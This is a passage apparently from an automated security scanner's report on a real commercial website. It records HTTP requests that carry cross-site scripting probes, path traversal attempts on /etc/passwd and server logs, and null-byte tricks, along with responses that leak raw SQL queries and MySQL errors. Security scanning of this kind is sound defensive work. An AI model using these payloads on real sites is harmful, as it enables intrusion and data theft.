Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jocr1j8f36k0035jc3eh84kos3; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/

/ppc/leadflow/bulo00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005C5)</script>

Request

GET /ppc/leadflow/bulo00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jif068n8tgmj1t08tcl4g3bm92; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005C6)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/inco00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C6)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2o4or6he96u741d4sm2mus3jp1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
